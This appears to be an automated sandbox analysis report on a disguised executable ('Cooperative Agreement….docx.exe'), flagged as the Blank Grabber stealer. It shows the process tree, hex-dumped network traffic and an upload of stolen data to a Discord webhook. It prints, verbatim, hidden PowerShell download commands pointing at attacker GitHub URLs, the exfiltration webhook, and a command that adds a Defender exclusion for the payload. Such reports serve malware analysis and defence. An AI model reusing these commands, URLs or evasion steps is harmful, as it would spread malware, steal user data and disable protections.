2024-12-05 18:36:29 UTC	1378	IN	Data Raw: ff ff 48 8b d8 48 3b 86 10 10 00 00 0f 82 f0 fe ff ff 33 c0 48 8b 9c 24 98 10 00 00 48 8b bc 24 a8 10 00 00 48 8b ac 24 a0 10 00 00 4c 8b b4 24 60 10 00 00 4c 8b a4 24 68 10 00 00 48 8b 8c 24 50 10 00 00 48 33 cc e8 c6 93 00 00 48 81 c4 70 10 00 00 41 5f 41 5d 5e c3 48 8b 05 f2 eb 03 00 4c 8d 44 24 38 48 8d 54 24 30 48 8d 4c 24 40 ff 15 8d 82 02 00 48 8b 05 de eb 03 00 4c 8d 44 24 38 48 8d 54 24 30 48 8d 4c 24 40 ff 15 71 82 02 00 48 8b 4c 24 30 33 f6 48 8b 05 33 ec 03 00 ff 15 5d 82 02 00 48 8b f8 48 8b c8 48 8b 05 50 ec 03 00 ff 15 4a 82 02 00 48 85 c0 74 0b 48 8b c8 e8 01 72 01 00 48 8b f0 48 8b 05 13 eb 03 00 48 8b cf ff 15 2a 82 02 00 41 80 bd 78 30 00 00 00 74 0e 48 8d 0d c1 8c 02 00 e8 d8 71 01 00 eb 1a 4c 8b 44 24 38 41 b9 02 00 00 00 48 8b 54 24 Data Ascii: HH;3H$H$H$L$`L$hH$PH3HpA_A]^HLD$8HT$0HL$@HLD$8HT$0HL$@qHL$03H3]HHHPJHtHrHHH*Ax0tHqLD$8AHT$
2024-12-05 18:36:29 UTC	1378	IN	Data Raw: 48 8d 4c 24 20 e8 d6 5b 00 00 48 8d 4c 24 20 85 c0 74 5a 48 8d 94 24 20 20 00 00 e8 40 5c 00 00 85 c0 79 18 48 8d 54 24 20 48 8d 0d 60 8c 02 00 e8 cb f0 ff ff b8 ff ff ff ff eb 59 41 b8 04 00 00 00 48 8d 94 24 20 20 00 00 48 8d 0d 9f 8c 02 00 e8 12 1b 01 00 33 d2 b9 08 00 00 00 85 c0 48 8d 84 24 20 20 00 00 0f 45 ca 48 03 c8 41 b8 00 10 00 00 48 8b d3 e8 25 5d 00 00 48 85 c0 75 13 48 8d 0d 79 8c 02 00 e8 74 f0 ff ff b8 ff ff ff ff eb 02 33 c0 48 8b 8c 24 20 40 00 00 48 33 cc e8 0b 8e 00 00 48 81 c4 30 40 00 00 5b c3 cc cc 40 55 57 41 54 b8 80 20 00 00 e8 f1 90 00 00 48 2b e0 48 8b 05 67 a8 03 00 48 33 c4 48 89 84 24 60 20 00 00 48 8b f9 b9 02 00 00 00 e8 6f 1c 01 00 48 8b c8 33 d2 e8 f9 1c 01 00 48 8d 4f 10 e8 ac fe ff ff 85 c0 79 0c 48 c7 c0 ff ff ff ff Data Ascii: HL$ [HL$ tZH$ @\yHT$ H`YAH$ H3H$ EHAH%]HuHyt3H$ @H3H0@[@UWAT H+HgH3H$` HoH3HOyH
2024-12-05 18:36:29 UTC	1378	IN	Data Raw: 24 b8 20 00 00 4c 8b bc 24 70 20 00 00 48 8b b4 24 b0 20 00 00 4c 8b b4 24 78 20 00 00 48 8b 9c 24 a8 20 00 00 48 8b 8c 24 60 20 00 00 48 33 cc e8 19 89 00 00 48 81 c4 80 20 00 00 41 5c 5f 5d c3 48 8b cf e8 95 4b 00 00 85 c0 79 09 48 8d 0d f2 83 02 00 eb a0 48 8d 9f 22 20 00 00 e9 b3 00 00 00 48 8d 0d ed 82 02 00 e8 40 4d 00 00 48 8b f0 48 85 c0 74 4d 80 38 00 74 48 48 8d 9f 22 20 00 00 4c 8b c8 48 8b cb 4c 8d 05 7b 7d 02 00 ba 00 10 00 00 e8 75 df ff ff 3d 00 10 00 00 7c 19 48 8d 0d 07 84 02 00 e8 f2 e9 ff ff 48 8b ce e8 7a 12 01 00 e9 42 ff ff ff 48 8b ce e8 6d 12 01 00 eb 52 48 8d 0d a4 83 02 00 e9 27 ff ff ff 48 8d 57 10 48 8d 4c 24 60 e8 81 07 00 00 4c 8b 87 70 30 00 00 48 8d 9f 22 20 00 00 48 8b cb 4d 85 c0 74 0c 48 8d 54 24 60 e8 b1 08 00 00 eb 16 Data Ascii: $ L$p H$ L$x H$ H$` H3H A\_]HKyHH" H@MHHtM8tHH" LHL{}u=\|HHzBHmRH'HWHL$`Lp0H" HMtHT$`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49766	162.159.138.232	443	280	C:\Users\user\AppData\Local\Temp\chost.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 18:37:21 UTC	302	OUT	POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 446171 User-Agent: python-urllib3/2.2.3 Content-Type: multipart/form-data; boundary=5645850d9eec13ce7bafd163781539ae
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: 2d 2d 35 36 34 35 38 35 30 64 39 65 65 63 31 33 63 65 37 62 61 66 64 31 36 33 37 38 31 35 33 39 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 ec b8 c9 a5 21 04 00 00 01 0f 9e 35 db 26 c6 10 50 18 b1 18 9a e4 70 61 61 8b 32 1e be ac f8 be be 88 3b bb 58 7f c4 7b 19 df 4e 73 a6 67 51 5d fa fc 0e 80 5e b9 3e 3d 3d dc df c4 e1 04 c2 dd 77 83 e9 64 6e 82 dd 73 1b 6c 17 e4 49 46 3d 61 94 22 ed d2 97 5d 73 fc 83 b5 6b 73 f4 a9 4b 4e Data Ascii: --5645850d9eec13ce7bafd163781539aeContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!5&Ppaa2;X{NsgQ]^>==wdnslIF=a"]sksKN
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: 14 3a a0 61 5f 89 f6 06 93 11 05 ad 13 a1 6c ef 84 22 03 dd 10 4a 90 3c 1c 35 3b 7e 7d bd 36 53 67 7e 12 93 bd 8b c0 6d 61 f9 ce 3a c4 9c 03 19 a7 89 af 2c c4 98 76 31 27 79 52 23 dc 21 52 d3 c7 f0 84 c8 56 f9 ce 58 d4 d5 09 e7 e0 6e 15 b1 59 ca 4e 56 b5 9a 7d 43 49 32 32 c4 e9 70 0d c2 2c 34 34 19 69 0f 84 db 5a b1 1f 3e d6 88 d1 fc 51 0f 28 e9 d2 a8 89 23 b8 22 7c 35 d1 5c 39 02 9c fa 79 0f 48 76 5f 86 3d d7 0e 59 72 29 43 ee 3f 79 5b 4d c9 e1 f7 d7 b2 03 bf 71 4d f3 7d 19 d5 0b f9 89 b6 e2 df a4 03 bb fa 9e 52 a8 e3 b2 e8 a3 41 80 0f 27 19 c3 d5 ca 93 86 35 e7 18 04 f0 cd eb 50 aa c7 d6 18 c7 3e c8 7e 70 99 0e 4e 3f 7d d8 64 72 86 7f 96 84 24 42 f7 b1 4a 5c 31 eb b3 93 5e 7c 37 60 ed 36 bf 1d 3e e8 5d ea e6 45 8e 90 cf 9a 86 c6 08 fd c4 e3 00 7a 22 49 Data Ascii: :a_l"J<5;~}6Sg~ma:,v1'yR#!RVXnYNV}CI22p,44iZ>Q(#"\|5\9yHv_=Yr)C?y[MqM}RA'5P>~pN?}dr$BJ\1^\|7`6>]Ez"I
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: 3e e1 a7 60 80 1d 97 72 a4 b7 49 80 5c 96 17 c1 3c 8b ad 8f a7 e7 71 91 fa 7e 08 c0 71 18 ab 7c e1 98 b0 ef 55 c6 9c 5c 0f 3b 92 6c 88 7e a2 60 40 e6 17 52 a5 0d 47 b2 46 8e 8f f2 33 16 ca d1 71 a2 db 68 58 77 1b 26 6d 43 cc 62 f9 b3 a7 d7 28 ef 3d 70 85 29 fa f1 56 b2 2d b3 e1 9b 42 0b 16 68 d2 b9 b7 21 a4 28 65 fe ff ca e8 ac d8 fd 6f bc cd b5 7c fe 7a fe 03 65 81 8a ef 86 3d d6 cb 5e c0 f1 4d d5 2a 17 0a 48 1c 04 5b 79 1e 97 e3 33 1c 81 0b 4b 0d c3 ef 98 62 40 04 59 d5 59 c2 3c e0 08 d8 54 3b a9 d3 e4 01 85 ec 94 e6 ab 7f 0e c7 7e c6 98 f3 c7 38 fc 05 55 68 51 57 3c 84 e9 5d 21 ed 6f 38 85 97 68 37 15 ae b9 4c e8 32 c2 01 6d 11 80 08 5d b4 d8 53 46 ec 9a e3 10 b0 4a 18 2b a5 9b 81 78 8a e9 16 52 a9 a6 dc 48 1b b4 6c bd da 60 ab 8d 48 db 55 30 44 f8 82 Data Ascii: >`rI\<q~q\|U\;l~`@RGF3qhXw&mCb(=p)V-Bh!(eo\|ze=^M*H[y3Kb@YY<T;~8UhQW<]!o8h7L2m]SFJ+xRHl`HU0D
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: fd 2c 8b dd 2d c3 d2 b7 6b fe b2 95 e6 27 d2 ef a8 9d 86 24 78 94 c9 35 c2 a4 66 bb 59 02 41 5c 6a 37 32 5a 14 ce 67 c6 0c 94 ae 79 cb e9 45 7b 5e 60 a2 44 96 76 93 1b dd 1e 57 ae 37 db 67 a9 0c a0 54 bd af 7a 0d 7d e5 27 9e 8a ac 3f 08 19 68 39 be 4f bc 67 07 46 27 ae be 13 3a 85 75 c3 65 fe 15 40 af 1c 65 a7 cc c7 f1 ae e6 87 84 35 10 03 50 ca 22 08 f7 bf 51 22 19 24 ab 05 b1 a2 c8 7b f2 c8 02 e7 e8 3a 11 ba 46 b1 9e 2d 66 17 b9 fd ac 61 81 b2 63 f5 7c a7 12 64 53 91 ab 41 19 44 f4 57 86 85 62 96 43 ea 9e 5c 77 39 9b bd ea 81 11 7c 14 1e 02 fe 20 d8 08 d2 6c 3d be 38 d8 57 14 26 f2 f1 7e 7f 92 89 a8 ca 6d a1 85 47 73 ab 6c 42 01 05 77 86 83 cc 1a a2 ea e8 2a 40 f1 5d 48 93 59 7f ac a2 4d 82 f4 eb 3f e3 9d a1 ac da b7 2b 40 29 75 ef f6 e1 fa 6d 32 fe 1b Data Ascii: ,-k'$x5fYA\j72ZgyE{^`DvW7gTz}'?h9OgF':ue@e5P"Q"${:F-fac\|dSADWbC\w9\| l=8W&~mGslBw*@]HYM?+@)um2
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: 82 4e 65 30 6f 55 7b 4b b6 f9 a4 23 05 ae 92 09 0a 74 95 f8 b6 2a 72 c6 43 12 ac e0 57 0b 41 7a 67 ad 79 a1 57 97 e8 99 67 94 06 1b 4c f2 ba 33 0b d7 cd d2 fd d7 4a dd 50 22 44 65 67 39 e4 2c 28 c2 ff d3 81 aa df 54 cc 60 d4 fe cb 30 a7 32 0c 4e ad f3 f7 0a ac 9b 19 f3 87 4d d7 2f a8 6b 5f 37 8f 15 5b 78 51 3a 79 62 17 6e c7 85 63 ef 83 0c 25 13 b7 0e ad 4b 5d b3 9e 86 40 c9 97 64 5f bb 3d b6 4b 25 ae 1b 85 4d 35 ba 77 20 88 ea 1b 93 36 14 ff bf 5b 82 ac 2b 32 ec bd c8 f7 55 9a 45 84 ea 3b 40 d9 4f e9 a3 1e e9 c3 3a 30 d0 e2 5a 63 54 4c e6 a7 55 8a b3 ce 3f ef ec 7d 1a 36 66 13 43 ac 30 b9 31 6b 82 73 d3 61 45 59 44 a9 8f 98 06 71 f7 3e 83 42 3b 6c a3 9a 14 52 1b 61 b2 6f 38 5a aa 07 2b ab f0 19 4b 74 ba 84 8b 3e bc ca e8 0e eb 99 b9 8e 45 c4 28 92 13 be Data Ascii: Ne0oU{K#t*rCWAzgyWgL3JP"Deg9,(T`02NM/k_7[xQ:ybnc%K]@d_=K%M5w 6[+2UE;@O:0ZcTLU?}6fC01ksaEYDq>B;lRao8Z+Kt>E(
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: e6 09 63 8b 9a 6a 27 47 85 3b 80 cd 05 59 13 c3 45 14 55 d4 69 d7 de cd fd a1 d7 fb 9a 69 37 a0 c4 44 d6 5f 31 24 9a 2e df 47 c8 38 c5 18 2f 02 fe 45 97 2c 77 f5 13 a6 af 38 e5 49 6c 27 84 cd 82 21 ec 42 a4 96 22 9e 35 15 f0 91 f8 80 f8 71 90 d9 9d 07 a2 ff c7 9e c6 64 72 06 18 f3 03 62 6a 5e bd 68 0b 2c 76 44 c0 58 d2 cd 84 a8 55 19 87 21 f4 23 ee 7f 70 41 0c 77 29 b3 ea 08 14 fb 92 48 cc dc 03 2b c5 a4 63 7b 8a 36 0b 37 71 cf f0 85 b5 95 29 ac e1 39 bb ff 75 87 23 af 79 20 80 b2 9d 9d c0 f3 9b 74 00 34 ad 87 4c 1c e2 c3 43 ea 11 5a f1 fb 4c 33 4c d5 e3 2b 3e 2d 4f db 59 71 0f 14 f2 c5 1b c6 2d 05 d4 dd 50 c1 bf 57 66 36 af 0d 89 16 af f3 5d cf 3e c9 2a ba aa a1 60 62 2d 75 e0 5d 4a 63 3a 6b be 88 49 8c 94 20 5b 3b 34 e5 a9 30 bc e2 9d 52 dc 51 b1 cb 80 Data Ascii: cj'G;YEUii7D_1$.G8/E,w8Il'!B"5qdrbj^h,vDXU!#pAw)H+c{67q)9u#y t4LCZL3L+>-OYq-PWf6]>*`b-u]Jc:kI [;40RQ
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: 75 99 a6 42 fe 15 3b 4f 22 52 5f 84 a7 f2 ae a0 e7 56 88 da 93 56 96 c5 3e 0e 98 c8 6b 26 3e 91 15 d8 27 29 5c f5 50 38 c6 8c e0 1c a4 5a d6 82 e2 e7 d2 c8 f4 f4 87 81 99 8c fa 53 26 4d fd b6 e3 97 1a b5 2e d9 34 28 b8 c6 92 74 26 b1 ce 0a 00 dd cc 93 3a 6c a7 af e4 04 03 d4 aa 99 87 33 95 b7 b4 f6 75 8e 1f cc 5a ce fa c6 8f b6 2b 6e 12 9d 65 12 13 b7 05 19 4b 17 c1 80 25 47 1c 9a a4 fa 2a 8c b7 47 2d 29 c9 08 2f e9 b9 3c b5 30 fc 2f 37 c3 59 c5 0b 8b a0 f4 21 9d 44 b9 02 31 14 a6 b1 b8 a5 0e 8d fd 1f 70 aa 11 e5 5e ed f3 fb f2 1a a2 aa d1 12 58 e7 57 91 70 b9 a9 ba 3d cf 88 40 36 05 15 f7 45 6a ca ca 57 38 5a 99 97 74 95 a6 b7 07 1b c3 92 00 43 69 f5 55 58 fe fb eb 15 7f 7a cb 59 06 e8 f2 6e 60 c7 05 0f 6a 05 c5 f6 b4 f4 f4 d3 37 32 26 06 ca b4 e0 e5 db Data Ascii: uB;O"R_VV>k&>')\P8ZS&M.4(t&:l3uZ+neK%G*G-)/<0/7Y!D1p^XWp=@6EjW8ZtCiUXzYn`j72&
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: 63 d1 01 c5 57 05 1d 00 17 0f 8b 52 ba 41 d4 4a 66 b6 86 7f 9c 9b 73 0a ba b1 c5 0e 33 a9 d6 7e 36 25 36 a1 1a 18 2c 61 a6 de 8b 81 fc c8 b4 65 32 41 0b 4a 5b 51 5e 4d 9e 8f 4d 48 fb 87 9f 8a 73 95 53 c9 1c fe bb 27 cc 1c 2c e8 ea f4 b3 34 51 d3 5d 2b de db 7c 23 ee e1 d6 a1 b2 67 9d b4 1a 81 b5 84 22 51 50 eb f3 1b 0a ac b9 d9 2e fd b6 20 a4 da c8 92 27 e2 2f 40 5a 46 f4 4a e8 12 9f 86 1a cb f6 e0 08 12 2c ef 9b 11 62 75 30 79 93 67 a6 01 17 d2 38 87 3d 51 b6 62 14 0b 56 43 45 66 f4 ba 1c 8c 3b 0d 26 1e b9 fe 60 a2 c3 f2 ef ca 48 c8 2f 9e 25 66 69 a1 b2 04 28 24 fc e8 65 e6 d0 89 70 f8 65 16 c0 35 d2 a4 c7 93 3f e2 b2 c1 77 f6 c9 fa 5e f3 21 0b be 6e dd 61 37 2d dd 51 e1 ab 33 d1 21 51 95 8c 2b 5d de 0e 99 c7 15 f0 7c 53 c6 bd 82 03 17 bf fc aa 17 54 e9 Data Ascii: cWRAJfs3~6%6,ae2AJ[Q^MMHsS',4Q]+\|#g"QP. '/@ZFJ,bu0yg8=QbVCEf;&`H/%fi($epe5?w^!na7-Q3!Q+]\|ST
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: a6 15 ee 14 66 be 86 e9 cc 06 a9 21 a9 9b fc 50 02 9d 65 0a 0e 51 5e 0d ef d9 a5 e7 7c b7 86 44 17 50 f1 16 23 fa fb 86 36 6b 6e a5 9e b6 5b db 96 42 d0 ff 0b 50 3d ab 7d 70 e8 03 62 31 00 f5 41 35 e5 e2 89 e6 e2 ee 45 48 d4 d2 96 15 ec 72 98 e4 c1 0c 7e 79 df 6c a5 c4 9f 6d e6 bf 62 2c 9c 0d 11 98 40 8f 7f 08 6c 65 92 3e 4e 55 fa f6 6e f0 a0 9b 69 7b fb d9 02 5c e9 99 71 55 f6 b0 9c 06 0d f6 60 16 ea 66 df 3a 7a 91 fc 0f 2f ee be f0 49 67 66 f4 95 22 d4 34 7a e1 93 7b 24 3c cd ac 4b 0a ec 2f 59 29 91 05 c6 da 0b 29 94 b4 ce c7 3c 4b 46 7c 0e a9 1d 50 03 5a 0c 7f df 2d 25 c6 fe 8f b3 6b 1d 46 b2 9d 5b 27 db 8d 2b ba bd 95 a3 40 e7 af e8 55 74 d8 96 90 64 2d 53 ad c5 08 82 c6 57 f2 ae ce bd 09 c4 59 11 bb b6 91 ee 2f 66 28 71 6b 83 13 2b 8e e7 08 13 31 c6 Data Ascii: f!PeQ^\|DP#6kn[BP=}pb1A5EHr~ylmb,@le>NUni{\qU`f:z/Igf"4z{$<K/Y))<KF\|PZ-%kF['+@Utd-SWY/f(qk+1
2024-12-05 18:37:21 UTC	16384	OUT	Data Raw: 66 ab 0a ef 5d 14 8f 3c 22 27 24 e2 9a c4 6c 22 c2 5e 48 c7 f0 cd 16 bf 31 dc 00 0e b2 00 8a d5 f2 86 2d 41 70 e7 d2 bf a6 a4 56 55 2d 70 fb df f7 c3 1b dd 52 29 e5 69 8c f1 0c e6 34 b3 f0 0d 16 df f8 87 2a 23 24 84 65 81 ff fa 4c b6 e1 c5 f3 2e 1b bc 97 3a 49 3f 4e 4d 32 ec 7e 4b c5 f0 dd 14 cd 7e f4 87 61 ce ab a4 ed 8a d4 e4 03 70 fb a3 5a f5 39 45 7f e5 51 8c c9 d1 ce 33 d6 cf d5 e4 be a7 39 2d d2 e0 02 68 59 5c e6 6a 24 0f 64 ad 42 96 b1 b0 8a 48 f9 ae 89 15 a9 f1 7b d8 b6 99 1b 1c 16 0f fa 60 d8 1a 2a ac f8 9e 60 32 33 87 d3 31 d2 86 14 9e 50 8b 27 29 b1 d7 32 75 ce 76 2e 57 4b 58 04 bd 27 2a 6c ee 39 28 cb df b2 09 cb 51 e8 81 9f 37 b0 f8 5e 5c fd e1 44 3e 5b 1f c2 7a 94 05 0f 5d 78 04 bd c8 f3 e9 3a a7 15 bd d0 84 84 85 6a 92 87 78 17 92 b1 26 65 Data Ascii: f]<"'$l"^H1-ApVU-pR)i4#$eL.:I?NM2~K~apZ9EQ39-hY\j$dBH{``231P')2uv.WKX'*l9(Q7^\D>[z]x:jx&e
2024-12-05 18:37:23 UTC	1255	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 18:37:23 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Set-Cookie: __dcfduid=f7c1be10b33711ef9922c6e1f182ee8e; Expires=Tue, 04-Dec-2029 18:37:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1733423844 x-ratelimit-reset-after: 1 vary: Accept-Encoding via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2BocHF7fex3lZNAH0vGrnvGKMo9eNSr9wk9dUbqjZ1SYQ%2BmKDpp6sftkyiF60IhWuMMtrfb17xpZl32hL4kP5q5RVdBMQEAX6IH%2B%2FyMA5LTnm1jRT5ISRwx7G2VD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=f7c1be10b33711ef9922c6e1f182ee8ec7933202cef54feeef1d1246689f0ab3e9c99fd324709db077da4d9929cfe820; Expires=Tue, 04-Dec-2029 18:37:23 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax

Target ID:	0
Start time:	13:36:11
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"
Imagebase:	0x400000
File size:	100'864 bytes
MD5 hash:	24FFDA8B313B8867568168889EDA370F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:36:12
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""
Imagebase:	0x7ff6ac500000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:36:12
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:36:12
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:36:23
Start date:	05/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:36:35
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:36:42
Start date:	05/12/2024
Path:	C:\Windows\System32\calc.exe
Wow64 process (32bit):	false
Commandline:	calc.exe
Imagebase:	0x7ff745630000
File size:	27'648 bytes
MD5 hash:	5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:36:42
Start date:	05/12/2024
Path:	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
Imagebase:	0x7ff7ba520000
File size:	4'099'584 bytes
MD5 hash:	94675EB54AC5DAA11ACE736DBFA9E7A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	13:36:42
Start date:	05/12/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Imagebase:	0x7ff70f330000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:36:42
Start date:	05/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	13:36:45
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\chost.exe
Wow64 process (32bit):	false
Commandline:	chost.exe
Imagebase:	0x7ff694360000
File size:	8'652'434 bytes
MD5 hash:	78F52BE4313947325B63CDB27B35C6DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000010.00000003.2023955880.0000025C3C156000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000010.00000003.2023955880.0000025C3C158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 53%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:36:48
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Local\Temp\chost.exe
Wow64 process (32bit):	false
Commandline:	chost.exe
Imagebase:	0x7ff694360000
File size:	8'652'434 bytes
MD5 hash:	78F52BE4313947325B63CDB27B35C6DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2371288192.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2367455038.0000016E17B2C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2048319230.0000016E1725C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000002.2372251589.0000016E16DBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000002.2373027155.0000016E173B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2047803547.0000016E172E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000011.00000003.2048510879.0000016E1725D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:36:51
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"
Imagebase:	0x7ff6ac500000
